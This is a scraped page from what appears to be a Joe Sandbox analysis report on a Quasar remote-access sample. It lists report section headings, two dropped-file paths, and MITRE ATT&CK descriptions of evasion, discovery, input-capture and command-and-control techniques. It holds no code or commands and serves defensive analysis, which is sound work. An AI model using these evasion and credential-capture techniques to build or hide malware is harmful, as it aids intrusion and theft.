Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5fr5gthkjdg71.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Quasar

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

Operating System Destruction

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Cuis\bon\Bara.exe

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe

Windows Analysis Report
5fr5gthkjdg71.exe

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre